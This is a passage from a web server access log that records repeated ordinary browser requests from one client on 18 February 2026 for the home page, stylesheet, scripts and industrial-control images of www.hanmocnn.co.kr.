AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1865] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:21:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10548] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:52:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10548] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 